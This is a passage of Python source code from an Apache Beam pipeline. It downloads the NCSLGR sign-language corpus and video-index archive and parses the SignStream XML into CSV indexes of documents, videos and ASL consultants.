remote_archive_path = 'http://www.bu.edu/asllrp/ncslgr-for-download/'+d_vid_indexes_info['video_indexes_archive']
local_archive_parent_dir = d_vid_indexes_info['tmp_dir']
local_archive_path = fileio.path_join(local_archive_parent_dir, d_vid_indexes_info['video_indexes_archive'])
video_ds_path = d_vid_indexes_info['video_ds_path']
print(f"VIDEO-INDEX BOOTSTRAP INFO: {d_vid_indexes_info}")
memfile = data_extractor__common.download_to_memfile(remote_archive_path, block_sz=8192, display=False)
zip_ref = zipfile.ZipFile(memfile, 'r')
print(f"unzipping {remote_archive_path} in-memory...")
# zip_ref.printdir()
sel_vid_index_path = d_vid_indexes_info['sel_vid_index_path']
sel_vid_index_path_suffix = d_vid_indexes_info['video_indexes_archive'].split('.')[0]+'/'+sel_vid_index_path.split('/')[-1]
sel_vid_index_fname = sel_vid_index_path_suffix.split('/')[-1]
# print(f"we need to pull {sel_vid_index_path_suffix} out of in-memory extracted archive")
bytes_unzipped = zip_ref.read(sel_vid_index_path_suffix)
zip_ref.close()
if not fileio.dir_path_exists(d_vid_indexes_info['vid_indexes_dir'], d_pl_options=d_pl_options)[0]:
fileio.make_dirs(d_vid_indexes_info['vid_indexes_dir'], d_pl_options=d_pl_options)
with fileio.open_file_write(d_vid_indexes_info['vid_indexes_dir']+'/'+sel_vid_index_fname) as f:
f.write(bytes_unzipped)
f.close()
memfile.close()
print(f"\tDONE")
return [d_vid_indexes_info['sel_vid_index_path']]
class TargetVideoIndexBootstrapper(beam__common.PipelinePcollElementProcessor):
def __init__(self, d_pl_options):
super(TargetVideoIndexBootstrapper, self).__init__(
fn_pcoll_element_processor=boostrap_target_video_index,
kargs={'d_pl_options':d_pl_options},
return_result=True
)
def pl__1__bootstrap_target_video_index(pl):
if not fileio.file_path_exists(pl._options._all_options[fidscs_globals.OPT_NAME_SELECTED_VIDEO_INDEX_PATH], pl._options._all_options)[0]:
sel_vid_index_path = (
pl
| "Beam PL: create initial pcoll containing information for boostrap_target_video_index" >> beam.Create(
[ # one row containing dict of:
# 1. url of video indexes archive
# 2. local destination (path) for the downloaded archive
# 3. local destination (path) which will receive the extracted archive csv files (there are more than one)
# 4. final path to the selected videx index csv
# (note that the dict is not laid out in the above order)
{
'vid_indexes_dir': pl._options._all_options[fidscs_globals.OPT_NAME_VIDEO_INDEXES_DIR],
'sel_vid_index_path': pl._options._all_options[fidscs_globals.OPT_NAME_SELECTED_VIDEO_INDEX_PATH],
'video_indexes_archive': fidscs_globals.VIDEO_INDEXES_ARCHIVE,
'tmp_dir': pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
'video_ds_path': pl._options._all_options[fidscs_globals.OPT_NAME_VIDEO_DS_PATH]
}
]
)
# | "Beam PL: bootstrap target video index" >> beam.Map(boostrap_target_video_index) # boostrap_target_video_index outputs SELECTED_VIDEO_INDEX_PATH but beam.Map() wraps this in a pcoll and is fed to...
| "Beam PL: bootstrap target video index" >> beam.ParDo(TargetVideoIndexBootstrapper(pl._options._all_options)) # boostrap_target_video_index outputs SELECTED_VIDEO_INDEX_PATH but beam.Map() wraps this in a pcoll and is fed to...
)
else:
sel_vid_index_path = (
pl
| "Beam PL: create initial pcoll containing path to existing sel_vid_index" >> beam.Create([pl._options._all_options[fidscs_globals.OPT_NAME_SELECTED_VIDEO_INDEX_PATH]])
| "Beam PL: print path to existing sel_vid_index" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="FOUND EXISTING SEL VID INDEX"))
)
full_target_vid_index_schemad_pcoll = (
sel_vid_index_path
| "Beam PL: read video index into pcoll" >> beam.FlatMap(beam__common.load_vid_index_csv)
| "Beam PL: apply schema to video index pcoll" >> beam.Map(
lambda x: beam.Row(
target_video_filename=str(urllib.parse.quote(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[0]])),
video_seq_id=int(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[1]]),
perspective_cam_id=int(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[2]]),
compressed_mov_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[3]]),
uncompressed_avi_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[4]]),
uncompressed_avi_mirror_1_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[5]]),
uncompressed_avi_mirror_2_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[6]])
)
)
)
return full_target_vid_index_schemad_pcoll
def pl__2__write_target_vid_index_csv(full_target_vid_index_schemad_pcoll, d_pl_options):
vid_index_path = fileio.path_join(d_pl_options[fidscs_globals.OPT_NAME_DATA_DIR], fidscs_globals.VIDEO_INDEX_BASE+'.csv')
if not fileio.file_path_exists(vid_index_path, d_pl_options)[0]:
sorted_full_target_vid_index_schemad_pcoll = beam__common.pl__X__sort_pcoll(full_target_vid_index_schemad_pcoll, pcoll_label="full_target_vid_index")
sorted_corpus_index_csv_rows_pcoll = (
sorted_full_target_vid_index_schemad_pcoll
| "Beam PL: re-apply schema to sorted_full_target_vid_index" >> beam.Map(lambda sorted_full_target_vid_index_schemad_pcoll_row: beam.Row(
target_video_filename=sorted_full_target_vid_index_schemad_pcoll_row.target_video_filename,
video_seq_id=sorted_full_target_vid_index_schemad_pcoll_row.video_seq_id,
perspective_cam_id=sorted_full_target_vid_index_schemad_pcoll_row.perspective_cam_id,
compressed_mov_url=sorted_full_target_vid_index_schemad_pcoll_row.compressed_mov_url,
uncompressed_avi_url=sorted_full_target_vid_index_schemad_pcoll_row.uncompressed_avi_url,
uncompressed_avi_mirror_1_url=sorted_full_target_vid_index_schemad_pcoll_row.uncompressed_avi_mirror_1_url,
uncompressed_avi_mirror_2_url=sorted_full_target_vid_index_schemad_pcoll_row.uncompressed_avi_mirror_2_url
)
)
| beam.Map(lambda sorted_full_target_vid_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(sorted_full_target_vid_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_corpus_index_csv_rows_pcoll,
"TARGET-VIDEO-INDEX",
fidscs_globals.VIDEO_INDEXES_ARCHIVE,
fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX,
d_pl_options
)
else:
print(f"FOUND EXISTING VID INDEX: {vid_index_path}")
return [vid_index_path]
def pl__2__filter_target_vid_index(full_target_vid_index_schemad_pcoll, d_pl_options):
# ******************** filter schemad target video index pcoll as desired (if necessary) using beam.transforms.sql.SqlTransform(), for example limiting size of pcoll data items to fidscs_globals.MAX_TARGET_VIDEOS: BEGIN ********************
max_target_videos = d_pl_options[fidscs_globals.OPT_NAME_MAX_TARGET_VIDEOS]
return beam__common.pl__X__subset_pcoll(full_target_vid_index_schemad_pcoll, "full_target_vid_index_schemad_pcoll", max_target_videos, d_pl_options)
# ******************** filter schemad video index pcoll as desired (if necessary) using beam.transforms.sql.SqlTransform(), for example limiting size of pcoll data items to fidscs_globals.MAX_TARGET_VIDEOS: END ********************
def pl__1__bootstrap_corpus_index(pl):
# ******************** bootstrap SignStream corpus: BEGIN ********************
not_all_exist = False
for doc_file_suffix in fidscs_globals.CORPUS_DOC_FILE_PATH_SUFFIXES:
doc_file_path = fileio.path_join(pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR], doc_file_suffix)
if not fileio.file_path_exists(doc_file_path, pl._options._all_options)[0]:
not_all_exist = True
print(f"MISSING A CORPUS DOC ({doc_file_path}) - DOWNLOADING AND EXTRACTING ALL FROM ARCHIVE")
break
else:
print(f"FOUND EXISTING CORPUS DOC: {doc_file_path}")
corpus_docs_path_pcoll = None
if not_all_exist:
corpus_docs_path_pcoll = (
pl
| "Beam PL: create initial pcoll containing information for boostrap_signstream_corpus" >> beam.Create(
[
{
'tmp_dir': pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
'corpus_archive': fidscs_globals.CORPUS_ARCHIVE
}
]
)
# | "Beam PL: bootstrap SignStream corpus" >> beam.FlatMap(boostrap_signstream_corpus) # boostrap_signstream_corpus outputs [fileio.path_join(d_corpus_info['tmp_dir'], d_corpus_info['corpus_archive'].split('.')[0])] if datasets do not yet exist, otherwise []
| "Beam PL: bootstrap SignStream corpus" >> beam.ParDo(SignstreamCorpusBootstrapper(pl._options._all_options)) # boostrap_signstream_corpus outputs [fileio.path_join(d_corpus_info['tmp_dir'], d_corpus_info['corpus_archive'].split('.')[0])] if datasets do not yet exist, otherwise []
)
else:
corpus_docs_path_pcoll = (
pl
| "Beam PL: create initial pcoll contain path to corpus docs" >> beam.Create(
[
fileio.path_join(
fileio.path_join(
pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
fidscs_globals.CORPUS_ARCHIVE.split('.')[0]
),
"*"
)
]
)
| "Beam PL: apply schema to corpus document files path pcoll" >> beam.Map(lambda x: beam.Row(corpus_docs_dir=str(x)))
)
return (
corpus_docs_path_pcoll
| "Beam PL: apply schema to corpus document files path pcoll" >> beam.Map(lambda x: beam.Row(corpus_docs_dir=str(x)))
)
# ******************** bootstrap SignStream corpus: END ********************
def pl__1__corpus_document_file_structure_to_corpus_index(pl):
tmp_dir = pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR]
return (
pl
| "Beam PL: get corpus documents" >> beam.io.fileio.MatchFiles(fileio.path_join(fileio.path_join(tmp_dir, fidscs_globals.CORPUS_ARCHIVE.split('.')[0]), "*"))
| "Beam PL: read corpus documents" >> beam.io.fileio.ReadMatches() # this results in a pcoll of fileio.ReadableFile objects
| "Beam PL: create corpus index dataset" >> beam.ParDo(CorpusDocumentFileProcessor(pl._options._all_options))
) # corpus_index_schemad_pcoll
def pl__2__write_corpus_index_csv(corpus_index_schemad_pcoll, global_var_value_assigner__raw_xml_b64_max_len, d_pl_options):
corpus_index_pcoll = (
corpus_index_schemad_pcoll
| "Beam PL: extract (<corpus doc id>, <corpus doc filename>, <xml (base-64)>, <length of xml (base-64)>)" >> beam.Map(
lambda corpus_index_schemad_pcoll_row:
# row = beam.Row(
# # SCHEMA_COL_NAMES__CORPUS_DS = [
# # 'DocumentID',
# # 'Filename',
# # 'XML_B64',
# # 'LEN'
# # ]
# DocumentID=int(self.next_doc_id),
# Filename=xml_db_fname,
# XML_B64=raw_xml_b64,
# LEN=len(raw_xml_b64)
# )
(
corpus_index_schemad_pcoll_row.DocumentID,
corpus_index_schemad_pcoll_row.Filename,
corpus_index_schemad_pcoll_row.XML_B64,
corpus_index_schemad_pcoll_row.LEN
)
)
)
sorted_corpus_index_pcoll = beam__common.pl__X__sort_pcoll(corpus_index_pcoll, pcoll_label="corpus_index")
sorted_corpus_index_csv_rows_pcoll = (
sorted_corpus_index_pcoll
| "Beam PL: re-apply schema to sorted_corpus_index" >> beam.Map(
lambda sorted_corpus_index_pcoll_row: beam.Row(
DocumentID=sorted_corpus_index_pcoll_row[0],
Filename=sorted_corpus_index_pcoll_row[1],
XML_B64=sorted_corpus_index_pcoll_row[2],
LEN=sorted_corpus_index_pcoll_row[3]
)
)
| beam.Map(lambda corpus_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(corpus_index_schemad_pcoll_row))
)
corpus_index_csv_path = beam__common.pl__X__write_pcoll_to_csv(
sorted_corpus_index_csv_rows_pcoll,
"CORPUS-INDEX",
fidscs_globals.CORPUS_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS,
d_pl_options
)
max_xml_b64_len = (
corpus_index_schemad_pcoll
| "Beam PL: select LEN" >> beam.Map(lambda corpus_index_schemad_pcoll_row: corpus_index_schemad_pcoll_row.LEN)
| beam.CombineGlobally(lambda corpus_index_b64_doc_length_rows: max(corpus_index_b64_doc_length_rows or [None]))
# debug
# | "Beam PL: print max (b64-encoded) length corpus doc" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="MAX (b64-encoded) DOC LENGTH"))
)
# corpus_index_csv_path_indexed = (
# corpus_index_csv_path
# | "Beam PL: apply RowIndex to corpus index csv path" >> beam.ParDo(RowIndexer(var_name_prefix="corpus_index_csv_path_id"))
# # debug
# # | "Beam PL: print indexed path to corpus index csv" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="INDEXED CORPUS INDEX CSV PATH"))
# )
corpus_index_csv_path_indexed = beam__common.pl__X__index_pcoll(corpus_index_csv_path, "corpus_index_csv_path")
max_xml_b64_len_indexed = (
max_xml_b64_len
| "Beam PL: assign to global var (fidscs_globals.MAX_RAW_XML_B64_LEN)" >> beam.ParDo(global_var_value_assigner__raw_xml_b64_max_len)
# | "Beam PL: apply RowIndex to maxlen" >> beam.ParDo(RowIndexer(var_name_prefix="max_xml_b64_len_id"))
# debug
# | "Beam PL: print indexed max (b64-encoded) length corpus doc" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="INDEXED MAX (b64-encoded) DOC LENGTH"))
)
max_xml_b64_len_indexed = beam__common.pl__X__index_pcoll(max_xml_b64_len_indexed, "max_xml_b64_len_indexed")
combined_corpus_index_csv_path_and_max_xml_b64_len_indexed = (
({
'corpus_index_csv_path': corpus_index_csv_path_indexed,
'max_len': max_xml_b64_len_indexed
})
| "Beam PL: merge corpus_index_csv_path and max_len" >> beam.CoGroupByKey()
# debug
# | "Beam PL: print combined results" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="READ CORPUS INDEX CSV TO PCOLL"))
)
return combined_corpus_index_csv_path_and_max_xml_b64_len_indexed
def pl__2__decode_XML(corpus_index_schemad_pcoll, d_pl_options):
# each row is of the form {'DocumentID': '37', 'Filename': ' biker.xml', 'XML_B64', 'LEN'}
"""
corpus_index_schemad_pcoll:
beam.Row(
# SCHEMA_COL_NAMES__CORPUS_DS = [
# 'DocumentID',
# 'Filename',
# 'XML_B64',
# 'LEN'
# ]
DocumentID=int(d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[0]]),
Filename=str(d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[1]]),
XML_B64=d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[2]],
LEN=int(d_corpus_document_info[fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS[3]])
)
"""
return (
corpus_index_schemad_pcoll
| "Beam PL: extract/decode base-64 encoded XML from corpus index document" >> beam.Map(decode_XML)
)
def parse_signstream_database(corpus_index_decoded_XML_pcoll_row):
d_corpus_index_decoded_XML = corpus_index_decoded_XML_pcoll_row[0]
"""
require:
d_corpus_index_decoded_XML:
{
'DocumentID': d_corpus_index_schemad_pcoll_row['DocumentID'],
'Filename': d_corpus_index_schemad_pcoll_row['Filename'],
'XML': raw_xml,
'LEN': len(raw_xml)
}
return:
{
'CORPUS_DOCUMENT_FILENAME': <corpus doc filename>,
'PARTICIPANT_SEQUENCE': [
{
'PARTICIPANT_NAME': <participant name>,
'PARTICIPANT_AGE': <participant age>,
'PARTICIPANT_GENDER': <participant gender>,
'UTTERANCE_SEQUENCE': [
{
'UTTERANCE_ENGLISH_TRANSLATION': <utterance English translation>,
'UTTERANCE_START_TIME': <utterance start time (time code)>,
'UTTERANCE_END_TIME': <utterance end time (time code)>,
'TARGET_VIDEO_SEQUENCE': [
{
'TARGET_VIDEO_FNAME': <target vid fname>,
'TARGET_VIDEO_CAMERA_PERSPECTIVE': <target vid camera perspective>
}
]
'TOKEN_SEQUENCE': [
{
'TOKEN_LINGUSTIC_TEXT': <token linguistic text>,
'TOKEN_START_TIME': <token start time (time code)>,
'TOKEN_END_TIME': <token end time (time code)>,
}
]
}
]
}
]
}
"""
document_record = {'CORPUS_DOCUMENT_FILENAME': d_corpus_index_decoded_XML['Filename']}
participant_sequence = []
# ********** parse (XML) document with SignStream: BEGIN **********
# debug
# print(f"length of (ASCII) XML document {d_corpus_index_decoded_XML['Filename']}: {d_corpus_index_decoded_XML['LEN']}")
in_memory_xml_doc = io.StringIO(d_corpus_index_decoded_XML['XML'])
ss_xml_db = ss.SignStreamDatabase.read_xml(in_memory_xml_doc)
for participant in ss_xml_db.get_participants():
participant_record = {}
participant_record['PARTICIPANT_NAME'] = participant.get_name()
participant_record['PARTICIPANT_AGE'] = participant.get_age()
participant_record['PARTICIPANT_GENDER'] = participant.get_gender()
utterance_sequence = []
utterances = [utterance for utterance in participant.get_utterances()]
for ui, utterance in enumerate(utterances):
utterance_record = {}
token_sequences = [token_sequence for token_sequence in utterance.get_tokens()]
main_gloss_token_sequence = [token for token in utterance.get_tokens_for_field("main gloss")]
utterance_main_gloss = ' '.join([token.get_text() for token in main_gloss_token_sequence])
utterance_translation = ' '.join([token.get_text() for token in token_sequences[-1]])
utterance_time_codes = utterance.get_timecodes()
utterance_record['UTTERANCE_ENGLISH_TRANSLATION'] = utterance_translation
utterance_record['UTTERANCE_START_TIME'] = utterance_time_codes[0]
utterance_record['UTTERANCE_END_TIME'] = utterance_time_codes[1]
media_sequence = []
for target_video in utterance.get_media():
target_video_record = {}
target_video_fname = str(urllib.parse.quote(target_video.get_filename().split(':')[-1]))
target_video_record['TARGET_VIDEO_FNAME'] = target_video_fname
media_camera_perspective = -1 # need to look this up!
target_video_record['TARGET_VIDEO_CAMERA_PERSPECTIVE'] = media_camera_perspective
media_url = "<need to look this up!>"
target_video_record['MEDIA_URL'] = media_url
media_sequence.append(target_video_record)
utterance_record['TARGET_VIDEO_SEQUENCE'] = media_sequence
token_sequence = []
for ti, token in enumerate(main_gloss_token_sequence):
token_record = {}
token_linguistic_text = token.get_text().encode('utf-8') # must be encoded as binary since token can have punctuation and possibly other non-alphabetic characters
token_record['TOKEN_LINGUSTIC_TEXT'] = token_linguistic_text
token_time_codes = token.get_timecodes()
token_record['TOKEN_START_TIME'] = token_time_codes[0]
token_record['TOKEN_END_TIME'] = token_time_codes[1]
token_sequence.append(token_record)
utterance_record['TOKEN_SEQUENCE'] = token_sequence
utterance_sequence.append(utterance_record)
participant_record['UTTERANCE_SEQUENCE'] = utterance_sequence
participant_sequence.append(participant_record)
document_record['PARTICIPANT_SEQUENCE'] = participant_sequence
# ********** parse (XML) document with SignStream: END **********
return document_record
def pl__5__load_full_vid_index(corpus_index_decoded_XML_pcoll):
return (
corpus_index_decoded_XML_pcoll
| "Beam PL: load vid index from csv into pcoll" >> beam.Create(
[ # one row containing dict of:
# 1. path to video index that was previously written to storage
{
'vid_index_path': fileio.path_join(fidscs_globals.DATA_ROOT_DIR, fidscs_globals.VIDEO_INDEXES_ARCHIVE.split('.')[0]+'.csv')
}
]
)
# debug
| "Beam PL: print saved vid index path" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="READ SAVED VID INDEX PATH"))
)
def pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, d_pl_options):
return (
corpus_index_decoded_XML_pcoll
| "Beam PL: parse signstream corpus document" >> beam.Map(parse_signstream_database)
)
def debug_print_signstream_db(d_corpus_index_decoded_XML_row):
d_corpus_index_decoded_XML = d_corpus_index_decoded_XML_row[0]
"""
d_corpus_index_decoded_XML: {'DocumentID':d_corpus_index_decoded_XML['DocumentID'],'Filename':d_corpus_index_decoded_XML['Filename'],'ss_xml_db':ss_xml_db}
"""
ss_xml_db = d_corpus_index_decoded_XML['ss_xml_db']
# debug
print(f"\tfields:")
fields = [field for field in ss_xml_db.get_fields()]
for fi, field in enumerate(fields):
field_values = [fv.get_name() for fv in field.get_values()]
print(f"\t\t#{fi}:")
print(f"\t\t\tname: {field.get_name()}")
print(f"\t\t\tlabel: {field.get_label()}")
print(f"\t\t\tvalues:")
for field_value in field_values:
print(f"\t\t\t\t{field_value}")
return [d_corpus_index_decoded_XML_row] # passthrough
def validate_preprocess_participant_to_asl_consultant_id(tpl_participant_info_grouped_by_name):
"""
tpl_participant_info_grouped_by_name: (<participant name>, [(<participant age (as string)>, participant_gender)])
"""
participant_name = tpl_participant_info_grouped_by_name[0]
particpant_info_tpl_list = list(tpl_participant_info_grouped_by_name[1])
if len(particpant_info_tpl_list) > 0:
age = -1
multiple_ages = []
gender = ""
multiple_genders = []
for participant_info_tpl in particpant_info_tpl_list:
_age = participant_info_tpl[0]
_age_list = list(map(int, re.findall(r'\d+', _age))) # we must parse using regex since it is possible to receive age string as '42 years' for example
_age = int(_age_list[0]) if len(_age_list)>0 else -1 # -1 indicates no age provided
multiple_ages.append(_age)
_gender = participant_info_tpl[1]
multiple_genders.append(_gender)
multiple_ages = set(multiple_ages)
if len(multiple_ages) > 0:
age = max(multiple_ages)
if len(multiple_ages) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} participant {participant_name} age is not unique: {multiple_ages}; assigning greatest value (most recent): {age}")
else:
if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} participant {participant_name} age info does not exist; assigning default age (-1)")
age = -1
multiple_genders = set(multiple_genders)
if len(multiple_genders) > 0 and (gender is None or len(gender)==0):
for _gender in multiple_genders:
if len(_gender)>0:
gender = _gender
if len(multiple_genders) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} participant {participant_name} gender is not unique: {multiple_genders}; current gender is {gender}; assigning first (non-empty) gender: {_gender}")
break
return [(participant_name, age, gender)]
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} participant {participant_name} does not have any associated info")
return [tpl_participant_info_grouped_by_name] # passthrough
def pl__4__create_asl_consultant_index_schemad_pcoll(ss_parsed_xmldb_pcoll, d_pl_options):
validated_mapping = (
ss_parsed_xmldb_pcoll
| "Beam PL: extract/transform participant records list" >> beam.Map(
lambda d_ss_parsed_xmldb_entry: [
(
d_participant['PARTICIPANT_NAME'],
(
d_participant['PARTICIPANT_AGE'],
d_participant['PARTICIPANT_GENDER']
)
) for d_participant in d_ss_parsed_xmldb_entry['PARTICIPANT_SEQUENCE']
]
)
| "Beam PL: 'explode' participant list into pcoll of individual participant records, keyed by name" >> beam.FlatMap(lambda participant_tpl: participant_tpl)
# debug
# | "Beam PL: print participant record for document" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="participant record"))
| "Beam PL: group participants keyed by named" >> beam.GroupByKey()
# the above produces tuples of the form:
# (<participant name>, [(<participant age (as string)>, participant_gender)])
| "Beam PL: validate/preprocess participant_to_asl_consultant_id mapping" >> beam.FlatMap(validate_preprocess_participant_to_asl_consultant_id) # outputs (<participant name>, <participant age (most recent)>, <participant gender>)
)
indexed_validated_mapping = beam__common.pl__X__index_pcoll(validated_mapping, "validated_mapping")
return (
indexed_validated_mapping
| "Beam PL: apply schema to particpant_list pcoll" >> beam.Map(lambda tpl_asl_consultant_id_validated_participant_info: beam.Row(
# SCHEMA_COL_NAMES__ASL_CONSULTANT_DS = [
# 'ASLConsultantID',
# 'Name',
# 'Age',
# 'Gender'
# ]
ASLConsultantID=int(tpl_asl_consultant_id_validated_participant_info[0]),
Name=str(tpl_asl_consultant_id_validated_participant_info[1][0]),
Age=int(tpl_asl_consultant_id_validated_participant_info[1][1]),
Gender=str(tpl_asl_consultant_id_validated_participant_info[1][2])
)
)
# debug
# | "Beam PL: print asl_consultant_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="asl_consultant_index_schemad_pcoll entry"))
) # asl_consultant_index_schemad_pcoll
def pl__5__write_asl_consultant_index_csv(asl_consultant_index_schemad_pcoll, d_pl_options):
sorted_asl_consultant_index_schemad_pcoll = beam__common.pl__X__sort_pcoll(asl_consultant_index_schemad_pcoll, pcoll_label="asl_consultant_index")
sorted_asl_consultant_index_csv_rows_pcoll = (
sorted_asl_consultant_index_schemad_pcoll
| "Beam PL: re-apply schema to sorted_asl_consultant_index" >> beam.Map(lambda sorted_asl_consultant_index_schemad_pcoll_row: beam.Row(
ASLConsultantID=sorted_asl_consultant_index_schemad_pcoll_row.ASLConsultantID,
Name=sorted_asl_consultant_index_schemad_pcoll_row.Name,
Age=sorted_asl_consultant_index_schemad_pcoll_row.Age,
Gender=sorted_asl_consultant_index_schemad_pcoll_row.Gender
)
)
| beam.Map(lambda asl_consultant_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(asl_consultant_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_asl_consultant_index_csv_rows_pcoll,
"ASLCONSULTANT-INDEX",
fidscs_globals.ASL_CONSULTANT_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__ASL_CONSULTANT_DS,
d_pl_options
) # asl_consultant_index_csv_path
def pl__5__create_document_asl_consultant_index_schemad_pcoll(ss_parsed_xmldb_pcoll, corpus_index_schemad_pcoll, asl_consultant_index_schemad_pcoll, d_pl_options):
document_participant_pcoll = (
ss_parsed_xmldb_pcoll
| "Beam PL: extract/transform document-participant records list" >> beam.Map(
lambda d_ss_parsed_xmldb_entry: [
(
d_ss_parsed_xmldb_entry['CORPUS_DOCUMENT_FILENAME'],
d_participant['PARTICIPANT_NAME']
) for d_participant in d_ss_parsed_xmldb_entry['PARTICIPANT_SEQUENCE']
]
)
| "Beam PL: 'explode' document-participant list into pcoll of individual document-participant records, keyed by name" >> beam.FlatMap(lambda document_participant_tpl: document_participant_tpl)
# debug
# | "Beam PL: print document-participant record" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document-participant record"))
| "Beam PL: group document-participants keyed by document filename" >> beam.GroupByKey()
# the above produces tuples of the form:
# (<document filename>, [<participant name>])
| "Beam PL: 'explode' document-participant-list into pcoll where each row has a list of (<document filename>, <participant name>)" >> beam.Map(
lambda document_participant_list_tpl: [
(
document_participant_list_tpl[0],
participant_name
) for participant_name in document_participant_list_tpl[1]
]
) # outputs [(<document filename>, <participant name>)]
| "Beam PL: 'explode' row as list of (<document filename>, <participant name>) into a pcoll where each row is an individual (<document filename>, <participant name>)" >> beam.FlatMap(lambda list_document_participant: list_document_participant)
# now we have a pcoll with rows as (<document filename>, <participant name>)
# debug
# | "Beam PL: print document-participant records" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document-participant entry"))
)
document_id_pcoll = (
corpus_index_schemad_pcoll
| "Beam PL: extract (<document filename>, <document id>) from corpus_index_schemad_pcoll" >> beam.Map(
lambda corpus_index_schemad_pcoll_row: (
corpus_index_schemad_pcoll_row.Filename,
corpus_index_schemad_pcoll_row.DocumentID
)
)
# | "Beam PL: print document-id-to-filename records" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document-id-to-filename entry"))
)
participant_name_doc_id = (
({
'document_id_pcoll': document_id_pcoll,
'document_participant_pcoll': document_participant_pcoll
})
| "Beam PL: merge document_id_pcoll and document_participant_pcoll" >> beam.CoGroupByKey()
# the above produces tuples of the form:
# ('ncslgr10e.xml', {'document_id_pcoll': ['7'], 'document_participant_pcoll': ['Norma Bowers Tourangeau', 'Benjamin Bahan']})
| "Beam PL: extract (<participant name>, <doc id>, <doc filename>) from merged document_id_pcoll and document_participant_pcoll" >> beam.Map(
lambda tpl: [
(
participant_name,
(
tpl[1]['document_id_pcoll'][0],
tpl[0]
)
) for participant_name in tpl[1]['document_participant_pcoll']
]
)
| "Beam PL: 'explode' doc-id-to-participant-name lists" >> beam.FlatMap(lambda list_doc_id_to_participant_name_tpl: list_doc_id_to_participant_name_tpl)
# debug
# | "Beam PL: print merged document_id_pcoll and document_participant_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="merged document_id_pcoll and document_participant_pcoll entry"))
)
participant_name_asl_constultant_id = (
asl_consultant_index_schemad_pcoll # Row(ASLConsultantID=0, Age=-1, Gender='female', Name='Lana Cook')
| "Beam PL: extract (<participant name>, <asl consultant id>) from asl_consultant_index_schemad_pcoll" >> beam.Map(
lambda asl_consultant_index_schemad_pcoll_row: (
asl_consultant_index_schemad_pcoll_row.Name,
asl_consultant_index_schemad_pcoll_row.ASLConsultantID
)
)
# debug
# | "Beam PL: print extracted (<participant name>, <asl consultant id>) from asl_consultant_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="extracted (<participant name>, <asl consultant id>) from asl_consultant_index_schemad_pcoll"))
)
document_asl_consultant_index_schemad_pcoll = (
({
'participant_name_doc_id': participant_name_doc_id,
'participant_name_asl_constultant_id': participant_name_asl_constultant_id
})
| "Beam PL: merge participant_name_doc_id and participant_name_asl_constultant_id" >> beam.CoGroupByKey()
# the above produces tuples of the form:
# ('Norma Bowers Tourangeau', {'participant_name_doc_id': [('24', 'ncslgr10l.xml'), ('33', 'ncslgr10i.xml'), ('7', 'ncslgr10e.xml'), ('29', 'ncslgr10k.xml'), ('13', 'ncslgr10f.xml'), ('21', 'ncslgr10m.xml'), ('30', 'ncslgr10j.xml'), ('18', 'ncslgr10c.xml'), ('5', 'ncslgr10d.xml'), ('25', 'ncslgr10n.xml')], 'participant_name_asl_constultant_id': [3]})
| "Beam PL: 'explode' participant-asl-consultant-id-doc-list into pcoll where each row has a list of (<doc id>, <asl consultant_id>)" >> beam.Map(
lambda participant_doc_id_list_tpl: [
(
int(corpus_doc_id_tpl[0]), # DocumentID
corpus_doc_id_tpl[1], # (corpus document) Filename
participant_doc_id_list_tpl[1]['participant_name_asl_constultant_id'][0], # ASLConsultantID
participant_doc_id_list_tpl[0] # <participant name>
) for corpus_doc_id_tpl in participant_doc_id_list_tpl[1]['participant_name_doc_id']
]
) # outputs [(<corpus doc id>, <corpus doc filename>, <asl consultant_id>, <participant name>)]
